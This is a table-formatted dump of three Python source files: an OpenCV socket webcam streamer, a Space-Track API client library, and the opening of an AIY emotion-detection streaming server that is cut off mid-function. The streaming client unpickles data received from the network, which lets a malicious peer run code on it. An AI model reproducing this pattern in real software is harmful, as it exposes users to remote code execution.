source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
streaming.py | import cv2
import socket
import pickle
import struct
import threading
class StreamingServer:
"""
Class for the streaming server.
Attributes
----------
Private:
__host : str
host address of the listening server
__port : int
port on which the server is listening
__clients : list
list of all connected clients
__quit_key : chr
key that has to be pressed to close connection
__running : bool
inicates if the server is already running or not
__block : Lock
a basic lock used for the synchronization of threads
__server_socket : socket
the main server socket
Methods
-------
Private:
__init_socket : method that binds the server socket to the host and port
__server_listening: method that listens for new connections
__client_connection : main method for processing the client streams
Public:
start_server : starts the server in a new thread
stop_server : stops the server and closes all connections
"""
def __init__(self, host, port, quit_key='q'):
"""
Creates a new instance of StreamingServer
Parameters
----------
host : str
host address of the listening server
port : int
port on which the server is listening
slots : int
amount of avaialable slots (not ready yet) (default = 8)
quit_key : chr
key that has to be pressed to close connection (default = 'q')
"""
self.__host = host
self.__port = port
self.__clients = []
self.__used_slots = 0
self.__running = False
self.__quit_key = quit_key
self.__block = threading.Lock()
self.__server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__init_socket()
def __init_socket(self):
"""
Binds the server socket to the given host and port
"""
self.__server_socket.bind((self.__host, self.__port))
def start_server(self):
"""
Starts the server if it is not running already.
"""
if self.__running:
print("Server is already running")
else:
self.__running = True
server_thread = threading.Thread(target=self.__server_listening)
server_thread.start()
print("Server started")
def __server_listening(self):
"""
Listens for new connections.
"""
self.__server_socket.listen()
while self.__running:
client_socket, _ = self.__server_socket.accept()
self.__clients.append(client_socket)
thread = threading.Thread(target=self.__client_connection, args=(client_socket,))
thread.start()
print("server: new client connected")
def stop_server(self):
"""
Stops the server and closes all connections
"""
if self.__running:
self.__running = False
closing_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
closing_connection.connect((self.__host, self.__port))
closing_connection.close()
self.__block.acquire()
self.__server_socket.close()
self.__block.release()
print("Server stopped")
else:
print("Server not running!")
def __client_connection(self, client_socket):
"""
Handles the individual client connections and processes their stream data.
"""
while self.__running:
try:
received = client_socket.recv(4096)
if received == b'':
break
for client in self.__clients:
client.sendall(received)
except:
self.__clients.remove(client_socket)
client_socket.close()
print("server: a client disconnected from server")
break
class StreamingClient:
"""
class for the camera streaming and listening client.
Attributes
----------
Private:
__host : str
host address to connect to
__port : int
port to connect to
__running : bool
inicates if the client is already listening or not
__streaming : bool
inicates if the client is already streaming or not
__encoding_parameters : list
a list of encoding parameters for OpenCV
__client_socket : socket
the main client socket
__camera : VideoCapture
the camera object
__x_res : int
the x resolution
__y_res : int
the y resolution
__quit_key : chr
key that has to be pressed to close connection
Methods
-------
Private:
__client_streaming : main method for streaming the client data
__server_listening : main method for listening for server data
Protected:
_configure : sets basic configurations
_get_frame : returns the camera frame to be sent to the server
_cleanup : cleans up all the resources and closes everything
Public:
start_streaming : starts the camera stream in a new thread
start_listening : starts the server listener in a new thread
stop_streaming : stops the camera stream
disconnect : disconnects from the server
"""
def __init__(self, host, port, x_res=1024, y_res=576, quit_key='q'):
"""
Creates a new instance of StreamingClient.
Parameters
----------
host : str
host address to connect to
port : int
port to connect to
x_res : int
x resolution of the stream
y_res : int
y resolution of the stream
quit_key : chr
key that has to be pressed to close connection (default = 'q')
"""
self.__host = host
self.__port = port
self.__x_res = x_res
self.__y_res = y_res
self.__quit_key = quit_key
self.__camera = cv2.VideoCapture(0)
self._configure()
self.__running = False
self.__streaming = False
self.__client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _configure(self):
"""
Sets the camera resultion and the encoding parameters.
"""
self.__camera.set(3, self.__x_res)
self.__camera.set(4, self.__y_res)
self.__encoding_parameters = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
def _get_frame(self):
"""
Gets the next camera frame.
Returns
-------
frame : the next camera frame to be processed
"""
ret, frame = self.__camera.read()
return frame
def _cleanup(self):
"""
Cleans up resources and closes everything.
"""
self.__camera.release()
cv2.destroyAllWindows()
def __client_streaming(self, connection):
"""
Main method for streaming the client data.
"""
while self.__streaming:
frame = self._get_frame()
result, frame = cv2.imencode('.jpg', frame, self.__encoding_parameters)
data = pickle.dumps(frame, 0)
size = len(data)
try:
connection.sendall(struct.pack('>L', size) + data)
except ConnectionResetError:
self.__streaming = False
except ConnectionAbortedError:
self.__streaming = False
except BrokenPipeError:
self.__streaming = False
self._cleanup()
def __server_listening(self, connection, address):
"""
Handles the individual client connections and processes their stream data.
"""
payload_size = struct.calcsize('>L')
data = b""
while self.__running:
break_loop = False
while len(data) < payload_size:
received = connection.recv(4096)
if received == b'':
connection.close()
self.__used_slots -= 1
break_loop = True
break
data += received
if break_loop:
break
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(data) < msg_size:
data += connection.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
cv2.imshow(str(address), frame)
if cv2.waitKey(1) == ord(self.__quit_key):
connection.close()
self.__used_slots -= 1
break
def start_listening(self):
"""
Starts client stream if it is not already running.
"""
if self.__running:
print("Client is already connected!")
else:
self.__running = True
self.__client_socket.connect((self.__host, self.__port))
address = self.__client_socket.getsockname()
listening_thread = threading.Thread(target=self.__server_listening, args=(self.__client_socket, address,))
listening_thread.start()
print("Client is now connected to {}:{}".format(self.__host, self.__port))
def start_streaming(self):
"""
Starts the client stream in a new thread.
"""
if self.__streaming:
print("Client is already streaming!")
else:
self.__streaming = True
thread = threading.Thread(target=self.__client_streaming, args=(self.__client_socket,))
thread.start()
print("Client is now streaming!")
def stop_stream(self):
"""
Stops client stream if running
"""
if self.__streaming:
self.__streaming = False
print("Client is now stopped streaming!")
else:
print("Client not streaming!")
def disconnect(self):
"""
Disconnects the client from the server.
"""
if self.__running:
self.__running = False
self.__client_socket.close()
print("Client is now disconnected!")
else:
print("Client not connected!")
|
base.py | import re
import threading
import time
import warnings
import weakref
from collections.abc import Mapping
from collections import OrderedDict
from functools import partial
import requests
from dateutil.parser import isoparse
from logbook import Logger
from represent import ReprHelper, ReprHelperMixin
from rush.quota import Quota
from rush.throttle import Throttle
from rush.limiters.periodic import PeriodicLimiter
from rush.stores.dictionary import DictionaryStore as RushDictionaryStore
from .operators import _stringify_predicate_value
logger = Logger('spacetrack')
type_re = re.compile(r'(\w+)')
enum_re = re.compile(r"""
enum\(
'(\w+)' # First value
(?:, # Subsequent values optional
'(\w+)' # Capture string
)*
\)
""", re.VERBOSE)
BASE_URL = 'https://www.space-track.org/'
class AuthenticationError(Exception):
"""Space-Track authentication error."""
class UnknownPredicateTypeWarning(RuntimeWarning):
"""Used to warn when a predicate type is unknown."""
class Predicate(ReprHelperMixin):
"""Hold Space-Track predicate information.
The current goal of this class is to print the repr for the user.
"""
def __init__(self, name, type_, nullable=False, default=None, values=None):
self.name = name
self.type_ = type_
self.nullable = nullable
self.default = default
# Values can be set e.g. for enum predicates
self.values = values
def _repr_helper_(self, r):
r.keyword_from_attr('name')
r.keyword_from_attr('type_')
r.keyword_from_attr('nullable')
r.keyword_from_attr('default')
if self.values is not None:
r.keyword_from_attr('values')
def parse(self, value):
if value is None:
return value
if self.type_ == 'float':
return float(value)
elif self.type_ == 'int':
return int(value)
elif self.type_ == 'datetime':
return isoparse(value)
elif self.type_ == 'date':
return isoparse(value).date()
else:
return value
class SpaceTrackClient:
"""SpaceTrack client class.
Parameters:
identity: Space-Track username.
password: Space-Track password.
base_url: May be overridden to use e.g. https://testing.space-track.org/
rush_store: A :mod:`rush` storage backend. By default, a
:class:`~rush.stores.dictionary.DictionaryStore` is used. You may
wish to use :class:`~rush.stores.dictionary.RedisStore` to
follow rate limits from multiple instances.
rush_key_prefix: You may choose a prefix for the keys that will be
stored in `rush_store`, e.g. to avoid conflicts in a redis db.
For more information, refer to the `Space-Track documentation`_.
.. _`Space-Track documentation`: https://www.space-track.org/documentation
#api-requestClasses
.. data:: request_controllers
Ordered dictionary of request controllers and their request classes in
the following order.
- `basicspacedata`
- `expandedspacedata`
- `fileshare`
- `spephemeris`
For example, if the ``spacetrack.file`` method is used without
specifying which controller, the client will choose the `fileshare`
controller (which comes before `spephemeris`).
.. note::
If new request classes and/or controllers are added to the
Space-Track API but not yet to this library, you can safely
subclass :class:`SpaceTrackClient` with a copy of this ordered
dictionary to add them.
That said, please open an issue on `GitHub`_ for me to add them to
the library.
.. _`GitHub`: https://github.com/python-astrodynamics/spacetrack
"""
# "request class" methods will be looked up by request controller in this
# order
request_controllers = OrderedDict.fromkeys([
'basicspacedata',
'expandedspacedata',
'fileshare',
'spephemeris',
])
request_controllers['basicspacedata'] = {
'announcement',
'boxscore',
'cdm_public',
'decay',
'gp',
'gp_history',
'launch_site',
'omm',
'satcat',
'satcat_change',
'satcat_debut',
'tip',
'tle',
'tle_latest',
'tle_publish',
}
request_controllers['expandedspacedata'] = {
'car',
'cdm',
'maneuver',
'maneuver_history',
'organization',
'satellite',
}
request_controllers['fileshare'] = {
'delete',
'download',
'file',
'folder',
'upload',
}
request_controllers['spephemeris'] = {
'download',
'file',
'file_history',
}
# List of (class, controller) tuples for
# requests which do not return a modeldef
offline_predicates = {
('upload', 'fileshare'): {'folder_id', 'file'},
('download', 'spephemeris'): set(),
}
# These predicates are available for every request class.
rest_predicates = {
Predicate('predicates', 'str'),
Predicate('metadata', 'enum', values=('true', 'false')),
Predicate('limit', 'str'),
Predicate('orderby', 'str'),
Predicate('distinct', 'enum', values=('true', 'false')),
Predicate(
'format', 'enum',
values=('json', 'xml', 'html', 'csv', 'tle', '3le', 'kvn', 'stream')),
Predicate('emptyresult', 'enum', values=('show',)),
Predicate('favorites', 'str'),
}
def __init__(
self,
identity,
password,
base_url=BASE_URL,
rush_store=None,
rush_key_prefix='',
):
#: :class:`requests.Session` instance. It can be mutated to configure
#: e.g. proxies.
self.session = self._create_session()
self.identity = identity
self.password = password
if not base_url.endswith('/'):
base_url += '/'
self.base_url = base_url
# If set, this will be called when we sleep for the rate limit.
self.callback = None
self._authenticated = False
self._predicates = dict()
self._controller_proxies = dict()
# From https://www.space-track.org/documentation#/api:
# Space-track throttles API use in order to maintain consistent
# performance for all users. To avoid error messages, please limit
# your query frequency.
# Limit API queries to less than 30 requests per minute / 300 requests
# per hour
if rush_store is None:
rush_store = RushDictionaryStore()
limiter = PeriodicLimiter(rush_store)
self._per_minute_throttle = Throttle(
limiter=limiter,
rate=Quota.per_minute(30),
)
self._per_hour_throttle = Throttle(
limiter=limiter,
rate=Quota.per_hour(300),
)
self._per_minute_key = rush_key_prefix + 'st_req_min'
self._per_hour_key = rush_key_prefix + 'st_req_hr'
def _ratelimit_callback(self, until):
duration = int(round(until - time.monotonic()))
logger.info('Rate limit reached. Sleeping for {:d} seconds.', duration)
if self.callback is not None:
self.callback(until)
@staticmethod
def _create_session():
"""Create session for accessing the web.
This method is overridden in
:class:`spacetrac.aio.AsyncSpaceTrackClient` to use :mod:`aiohttp`
instead of :mod:`requests`.
"""
return requests.Session()
def authenticate(self):
"""Authenticate with Space-Track.
Raises:
spacetrack.base.AuthenticationError: Incorrect login details.
.. note::
This method is called automatically when required.
"""
if not self._authenticated:
login_url = self.base_url + 'ajaxauth/login'
data = {'identity': self.identity, 'password': self.password}
resp = self.session.post(login_url, data=data)
_raise_for_status(resp)
# If login failed, we get a JSON response with {'Login': 'Failed'}
resp_data = resp.json()
if isinstance(resp_data, Mapping):
if resp_data.get('Login', None) == 'Failed':
raise AuthenticationError()
self._authenticated = True
def generic_request(self, class_, iter_lines=False, iter_content=False,
controller=None, parse_types=False, **kwargs):
r"""Generic Space-Track query.
The request class methods use this method internally; the public
API is as follows:
.. code-block:: python
st.tle_publish(*args, **kw)
st.basicspacedata.tle_publish(*args, **kw)
st.file(*args, **kw)
st.fileshare.file(*args, **kw)
st.spephemeris.file(*args, **kw)
They resolve to the following calls respectively:
.. code-block:: python
st.generic_request('tle_publish', *args, **kw)
st.generic_request('tle_publish', *args, controller='basicspacedata', **kw)
st.generic_request('file', *args, **kw)
st.generic_request('file', *args, controller='fileshare', **kw)
st.generic_request('file', *args, controller='spephemeris', **kw)
Parameters:
class\_: Space-Track request class name
iter_lines: Yield result line by line
iter_content: Yield result in 100 KiB chunks.
controller: Optionally specify request controller to use.
parse_types: Parse string values in response according to type given
in predicate information, e.g. ``'2017-01-01'`` ->
``datetime.date(2017, 1, 1)``.
**kwargs: These keywords must match the predicate fields on
Space-Track. You may check valid keywords with the following
snippet:
.. code-block:: python
spacetrack = SpaceTrackClient(...)
spacetrack.tle.get_predicates()
# or
spacetrack.get_predicates('tle')
See :func:`~spacetrack.operators._stringify_predicate_value` for
which Python objects are converted appropriately.
Yields:
Lines—stripped of newline characters—if ``iter_lines=True``
Yields:
100 KiB chunks if ``iter_content=True``
Returns:
Parsed JSON object, unless ``format`` keyword argument is passed.
.. warning::
Passing ``format='json'`` will return the JSON **unparsed**. Do
not set ``format`` if you want the parsed JSON object returned!
"""
if iter_lines and iter_content:
raise ValueError('iter_lines and iter_content cannot both be True')
if 'format' in kwargs and parse_types:
raise ValueError('parse_types can only be used if format is unset.')
if controller is None:
controller = self._find_controller(class_)
else:
classes = self.request_controllers.get(controller, None)
if classes is None:
raise ValueError(f'Unknown request controller {controller!r}')
if class_ not in classes:
raise ValueError(
f'Unknown request class {class_!r} for controller {controller!r}')
# Decode unicode unless class == download, including conversion of
# CRLF newlines to LF.
decode = (class_ != 'download')
if not decode and iter_lines:
error = (
'iter_lines disabled for binary data, since CRLF newlines '
'split over chunk boundaries would yield extra blank lines. '
'Use iter_content=True instead.')
raise ValueError(error)
self.authenticate()
url = f'{self.base_url}{controller}/query/class/{class_}'
offline_check = (class_, controller) in self.offline_predicates
valid_fields = {p.name for p in self.rest_predicates}
predicates = None
if not offline_check:
# Validate keyword argument names by querying valid predicates from
# Space-Track
predicates = self.get_predicates(class_, controller)
predicate_fields = {p.name for p in predicates}
valid_fields |= predicate_fields
else:
valid_fields |= self.offline_predicates[(class_, controller)]
for key, value in kwargs.items():
if key not in valid_fields:
raise TypeError(f"'{class_}' got an unexpected argument '{key}'")
if class_ == 'upload' and key == 'file':
continue
value = _stringify_predicate_value(value)
url += f'/{key}/{value}'
logger.debug(requests.utils.requote_uri(url))
if class_ == 'upload':
if 'file' not in kwargs:
raise TypeError("missing keyword argument: 'file'")
resp = self.session.post(url, files={'file': kwargs['file']})
else:
resp = self._ratelimited_get(url, stream=iter_lines or iter_content)
_raise_for_status(resp)
if resp.encoding is None:
resp.encoding = 'UTF-8'
if iter_lines:
return _iter_lines_generator(resp, decode_unicode=decode)
elif iter_content:
return _iter_content_generator(resp, decode_unicode=decode)
else:
# If format is specified, return that format unparsed. Otherwise,
# parse the default JSON response.
if 'format' in kwargs:
if decode:
data = resp.text
# Replace CRLF newlines with LF, Python will handle platform
# specific newlines if written to file.
data = data.replace('\r\n', '\n')
else:
data = resp.content
return data
else:
data = resp.json()
if predicates is None or not parse_types:
return data
else:
return self._parse_types(data, predicates)
@staticmethod
def _parse_types(data, predicates):
predicate_map = {p.name: p for p in predicates}
for obj in data:
for key, value in obj.items():
if key.lower() in predicate_map:
obj[key] = predicate_map[key.lower()].parse(value)
return data
def _ratelimited_get(self, *args, **kwargs):
"""Perform get request, handling rate limiting."""
minute_limit = self._per_minute_throttle.check(self._per_minute_key, 1)
hour_limit = self._per_hour_throttle.check(self._per_hour_key, 1)
sleep_time = 0
if minute_limit.limited:
sleep_time = minute_limit.retry_after.total_seconds()
if hour_limit.limited:
sleep_time = max(sleep_time, hour_limit.retry_after.total_seconds())
if sleep_time > 0:
self._ratelimit_wait(sleep_time)
resp = self.session.get(*args, **kwargs)
# It's possible that Space-Track will return HTTP status 500 with a
# query rate limit violation. This can happen if a script is cancelled
# before it has finished sleeping to satisfy the rate limit and it is
# started again.
#
# Let's catch this specific instance and retry once if it happens.
if resp.status_code == 500:
# Let's only retry if the error page tells us it's a rate limit
# violation.
if 'violated your query rate limit' in resp.text:
# It seems that only the per-minute rate limit causes an HTTP
# 500 error. Breaking the per-hour limit seems to result in an
# email from Space-Track instead.
self._ratelimit_wait(
self._per_minute_throttle.rate.period.total_seconds()
)
resp = self.session.get(*args, **kwargs)
return resp
def _ratelimit_wait(self, duration):
until = time.monotonic() + duration
t = threading.Thread(target=self._ratelimit_callback, args=(until,))
t.daemon = True
t.start()
time.sleep(duration)
def __getattr__(self, attr):
if attr in self.request_controllers:
controller_proxy = self._controller_proxies.get(attr)
if controller_proxy is None:
controller_proxy = _ControllerProxy(self, attr)
self._controller_proxies[attr] = controller_proxy
return controller_proxy
try:
controller = self._find_controller(attr)
except ValueError:
raise AttributeError(
f"'{self.__class__.__name__}' object has no attribute '{attr}'")
# generic_request can resolve the controller itself, but we
# pass it because we have to check if the class_ is owned
# by a controller here anyway.
function = partial(
self.generic_request, class_=attr, controller=controller)
function.get_predicates = partial(
self.get_predicates, class_=attr, controller=controller)
return function
def __dir__(self):
"""Include request controllers and request classes."""
attrs = list(self.__dict__)
request_classes = {
class_ for classes in self.request_controllers.values()
for class_ in classes}
attrs += list(request_classes)
attrs += list(self.request_controllers)
return sorted(attrs)
def _find_controller(self, class_):
"""Find first controller that matches given request class.
Order is specified by the keys of
``SpaceTrackClient.request_controllers``
(:class:`~collections.OrderedDict`)
"""
for controller, classes in self.request_controllers.items():
if class_ in classes:
return controller
else:
raise ValueError(f'Unknown request class {class_!r}')
def _download_predicate_data(self, class_, controller):
"""Get raw predicate information for given request class, and cache for
subsequent calls.
"""
self.authenticate()
url = f'{self.base_url}{controller}/modeldef/class/{class_}'
logger.debug(requests.utils.requote_uri(url))
resp = self._ratelimited_get(url)
_raise_for_status(resp)
return resp.json()['data']
def get_predicates(self, class_, controller=None):
"""Get full predicate information for given request class, and cache
for subsequent calls.
"""
if class_ not in self._predicates:
if controller is None:
controller = self._find_controller(class_)
else:
classes = self.request_controllers.get(controller, None)
if classes is None:
raise ValueError(
f'Unknown request controller {controller!r}')
if class_ not in classes:
raise ValueError(
f'Unknown request class {class_!r}')
predicates_data = self._download_predicate_data(class_, controller)
predicate_objects = self._parse_predicates_data(predicates_data)
self._predicates[class_] = predicate_objects
return self._predicates[class_]
def _parse_predicates_data(self, predicates_data):
predicate_objects = []
for field in predicates_data:
full_type = field['Type']
type_match = type_re.match(full_type)
if not type_match:
raise ValueError(
f"Couldn't parse field type '{full_type}'")
type_name = type_match.group(1)
field_name = field['Field'].lower()
nullable = (field['Null'] == 'YES')
default = field['Default']
types = {
# Strings
'char': 'str',
'varchar': 'str',
'longtext': 'str',
'text': 'str',
# varbinary only used for 'file' request class, for the
# 'file_link' predicate.
'varbinary': 'str',
# Integers
'bigint': 'int',
'int': 'int',
'tinyint': 'int',
'smallint': 'int',
'mediumint': 'int',
# Floats
'decimal': 'float',
'float': 'float',
'double': 'float',
# Date/Times
'date': 'date',
'timestamp': 'datetime',
'datetime': 'datetime',
# Enum
'enum': 'enum',
# Bytes
'longblob': 'bytes',
}
if type_name not in types:
warnings.warn(
f'Unknown predicate type {type_name!r}',
UnknownPredicateTypeWarning,
)
predicate = Predicate(
name=field_name,
type_=types.get(type_name, type_name),
nullable=nullable,
default=default)
if type_name == 'enum':
enum_match = enum_re.match(full_type)
if not enum_match:
raise ValueError(
f"Couldn't parse enum type '{full_type}'")
# match.groups() doesn't work for repeating groups, use findall
predicate.values = tuple(re.findall(r"'(\w+)'", full_type))
predicate_objects.append(predicate)
return predicate_objects
def __repr__(self):
r = ReprHelper(self)
r.parantheses = ('<', '>')
r.keyword_from_attr('identity')
return str(r)
class _ControllerProxy:
"""Proxies request class methods with a preset request controller."""
def __init__(self, client, controller):
# The client will cache _ControllerProxy instances, so only store
# a weak reference to it.
self.client = weakref.proxy(client)
self.controller = controller
def __getattr__(self, attr):
if attr not in self.client.request_controllers[self.controller]:
raise AttributeError(f"'{self!r}' object has no attribute '{attr}'")
function = partial(
self.client.generic_request, class_=attr,
controller=self.controller)
function.get_predicates = partial(
self.client.get_predicates, class_=attr,
controller=self.controller)
return function
def __repr__(self):
r = ReprHelper(self)
r.parantheses = ('<', '>')
r.keyword_from_attr('controller')
return str(r)
def get_predicates(self, class_):
"""Proxy ``get_predicates`` to client with stored request
controller.
"""
return self.client.get_predicates(
class_=class_, controller=self.controller)
def _iter_content_generator(response, decode_unicode):
"""Generator used to yield 100 KiB chunks for a given response."""
for chunk in response.iter_content(100 * 1024, decode_unicode=decode_unicode):
if decode_unicode:
# Replace CRLF newlines with LF, Python will handle
# platform specific newlines if written to file.
chunk = chunk.replace('\r\n', '\n')
# Chunk could be ['...\r', '\n...'], stril trailing \r
chunk = chunk.rstrip('\r')
yield chunk
def _iter_lines_generator(response, decode_unicode):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
The function is taken from :meth:`requests.models.Response.iter_lines`, but
modified to use our :func:`~spacetrack.base._iter_content_generator`. This
is because Space-Track uses CRLF newlines, so :meth:`str.splitlines` can
cause us to yield blank lines if one chunk ends with CR and the next one
starts with LF.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in _iter_content_generator(response, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
yield from lines
if pending is not None:
yield pending
def _raise_for_status(response):
"""Raises stored :class:`HTTPError`, if one occurred.
This is the :meth:`requests.models.Response.raise_for_status` method,
modified to add the response from Space-Track, if given.
"""
http_error_msg = ''
if 400 <= response.status_code < 500:
http_error_msg = (
f'{response.status_code} Client Error: {response.reason} '
f'for url: {response.url}'
)
elif 500 <= response.status_code < 600:
http_error_msg = (
f'{response.status_code} Server Error: {response.reason} '
f'for url: {response.url}'
)
if http_error_msg:
spacetrack_error_msg = None
try:
json = response.json()
if isinstance(json, Mapping):
spacetrack_error_msg = json['error']
except (ValueError, KeyError):
pass
if not spacetrack_error_msg:
spacetrack_error_msg = response.text
if spacetrack_error_msg:
http_error_msg += '\nSpace-Track response:\n' + spacetrack_error_msg
raise requests.HTTPError(http_error_msg, response=response)
|
server.py | import sys
sys.path.insert(0, '/home/mendel/emotion-mesh/cloud-detector')
sys.path.append('db')
import base64
import contextlib
import hashlib
import io
import os
import logging
import queue
import select
import socket
import struct
import subprocess
import threading
import time
from shutil import copyfile, move
from detect_face import perform_cloud_detection
from enum import Enum
from http.server import BaseHTTPRequestHandler
from itertools import cycle
import globals
from .db import emotionBackend
from .proto import messages_pb2 as pb2
logger = logging.getLogger(__name__)
class NAL:
CODED_SLICE_NON_IDR = 1 # Coded slice of a non-IDR picture
CODED_SLICE_IDR = 5 # Coded slice of an IDR picture
SEI = 6 # Supplemental enhancement information (SEI)
SPS = 7 # Sequence parameter set
PPS = 8 # Picture parameter set
ALLOWED_NALS = {NAL.CODED_SLICE_NON_IDR,
NAL.CODED_SLICE_IDR,
NAL.SPS,
NAL.PPS,
NAL.SEI}
def StartMessage(resolution):
width, height = resolution
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
start=pb2.Start(width=width, height=height))
def StopMessage():
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
stop=pb2.Stop())
def VideoMessage(data):
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
video=pb2.Video(data=data))
def OverlayMessage(svg):
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
overlay=pb2.Overlay(svg=svg))
def ProcessingMessage():
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
processing=pb2.Processing())
def DetectionResultMessage(imagePath, emotionResult):
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
detectionResult=pb2.DetectionResult(imagePath=imagePath, emotionResult=emotionResult))
def ResetMessage():
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
reset=pb2.Reset())
def ResponseMessage(correct):
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
response=pb2.Response(correct=correct))
def StatsMessage(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
stats=pb2.Stats(total=total, correct=correct, incorrect=incorrect, anger=anger,
neutral=neutral, happiness=happiness, contempt=contempt, disgust=disgust,
fear=fear, sadness=sadness, surprise=surprise))
def _parse_server_message(data):
message = pb2.ServerBound()
message.ParseFromString(data)
return message
def _parse_image_capture(data):
message = pb2.FrameCapture()
message.ParseFromString(data)
return message
def _shutdown(sock):
try:
sock.shutdown(socket.SHUT_RDWR)
except OSError:
pass
def _file_content_type(path):
if path.endswith('.html'):
return 'text/html; charset=utf-8'
elif path.endswith('.js'):
return 'text/javascript; charset=utf-8'
elif path.endswith('.css'):
return 'text/css; charset=utf-8'
elif path.endswith('.png'):
return'image/png'
elif path.endswith('.jpg') or path.endswith('.jpeg'):
return'image/jpeg'
elif path.endswith('.wasm'):
return'application/wasm'
else:
return 'application/octet-stream'
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), 'assets'))
def _asset_path(path):
if path == '/':
value = os.environ.get('SERVER_INDEX_HTML')
if value is not None:
return value
path = 'index.html'
elif path[0] == '/':
path = path[1:]
asset_path = os.path.abspath(os.path.join(BASE_PATH, path))
if os.path.commonpath((BASE_PATH, asset_path)) != BASE_PATH:
return None
return asset_path
def _read_asset(path):
asset_path = _asset_path(path)
if asset_path is not None:
with contextlib.suppress(Exception):
with open(asset_path, 'rb') as f:
return f.read(), _file_content_type(asset_path)
return None, None
class HTTPRequest(BaseHTTPRequestHandler):
def __init__(self, request_buf):
self.rfile = io.BytesIO(request_buf)
self.raw_requestline = self.rfile.readline()
self.parse_request()
def _read_http_request(sock):
request = bytearray()
while b'\r\n\r\n' not in request:
buf = sock.recv(2048)
if not buf:
break
request.extend(buf)
return request
def _http_ok(content, content_type):
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Length: %d\r\n'
'Content-Type: %s\r\n'
'Connection: Keep-Alive\r\n\r\n'
) % (len(content), content_type)
return header.encode('ascii') + content
def _http_switching_protocols(token):
accept_token = token.encode('ascii') + b'258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
accept_token = hashlib.sha1(accept_token).digest()
header = (
'HTTP/1.1 101 Switching Protocols\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Accept: %s\r\n\r\n'
) % base64.b64encode(accept_token).decode('ascii')
return header.encode('ascii')
def _http_not_found():
return 'HTTP/1.1 404 Not Found\r\n\r\n'.encode('ascii')
@contextlib.contextmanager
def Socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', port))
sock.listen()
try:
yield sock
finally:
_shutdown(sock)
sock.close()
class DroppingQueue:
def __init__(self, maxsize):
if maxsize <= 0:
raise ValueError('Maxsize must be positive.')
self.maxsize = maxsize
self._items = []
self._cond = threading.Condition(threading.Lock())
def put(self, item, replace_last=False):
with self._cond:
was_empty = len(self._items) == 0
if len(self._items) < self.maxsize:
self._items.append(item)
if was_empty:
self._cond.notify()
return False # Not dropped.
if replace_last:
self._items[len(self._items) - 1] = item
return False # Not dropped.
return True # Dropped.
def get(self):
with self._cond:
while not self._items:
self._cond.wait()
return self._items.pop(0)
class AtomicSet:
def __init__(self):
self._lock = threading.Lock()
self._set = set()
def add(self, value):
with self._lock:
self._set.add(value)
return value
def remove(self, value):
with self._lock:
try:
self._set.remove(value)
return True
except KeyError:
return False
def __len__(self):
with self._lock:
return len(self._set)
def __iter__(self):
with self._lock:
return iter(self._set.copy())
class PresenceServer:
SERVICE_TYPE = '_aiy_vision_video._tcp'
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __init__(self, name, port):
logger.info('Start publishing %s on port %d.', name, port)
cmd = ['avahi-publish-service', name, self.SERVICE_TYPE, str(port), 'AIY Streaming']
self._process = subprocess.Popen(cmd, shell=False)
def close(self):
self._process.terminate()
self._process.wait()
logger.info('Stop publishing.')
class StreamingServer:
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __init__(self, camera, bitrate=1000000, mdns_name=None,
tcp_port=4665, web_port=4664, annexb_port=4666):
self._bitrate = bitrate
self._camera = camera
self._clients = AtomicSet()
self._enabled_clients = AtomicSet()
self._done = threading.Event()
self._commands = queue.Queue()
self._thread = threading.Thread(target=self._run,
args=(mdns_name, tcp_port, web_port, annexb_port))
self._thread.start()
def close(self):
self._done.set()
self._thread.join()
def send_overlay(self, svg):
for client in self._enabled_clients:
client.send_overlay(svg)
def _start_recording(self):
logger.info('Camera start recording')
self._camera.start_recording(self, format='h264', profile='baseline',
inline_headers=True, bitrate=self._bitrate, intra_period=0)
time.sleep(.500)
self._get_stats()
def _stop_recording(self):
logger.info('Camera stop recording')
self._camera.stop_recording()
def _get_stats(self):
stats = emotionBackend.getStats()
total = stats['total'][0]
correct = stats['correct'][0]
incorrect = stats['incorrect'][0]
anger = stats['anger']
neutral = stats['neutral']
happiness = stats['happiness']
contempt = stats['contempt']
disgust = stats['disgust']
fear = stats['fear']
sadness = stats['sadness']
surprise = stats['surprise']
for cl in self._enabled_clients:
cl.send_stats_message(total=total, correct=correct, incorrect=incorrect, anger=anger,
neutral=neutral, happiness=happiness, contempt=contempt,
disgust=disgust, fear=fear, sadness=sadness, surprise=surprise)
logger.info('Stats sent to clients...')
def _process_command(self, client, command):
was_streaming = bool(self._enabled_clients)
if command is ClientCommand.ENABLE:
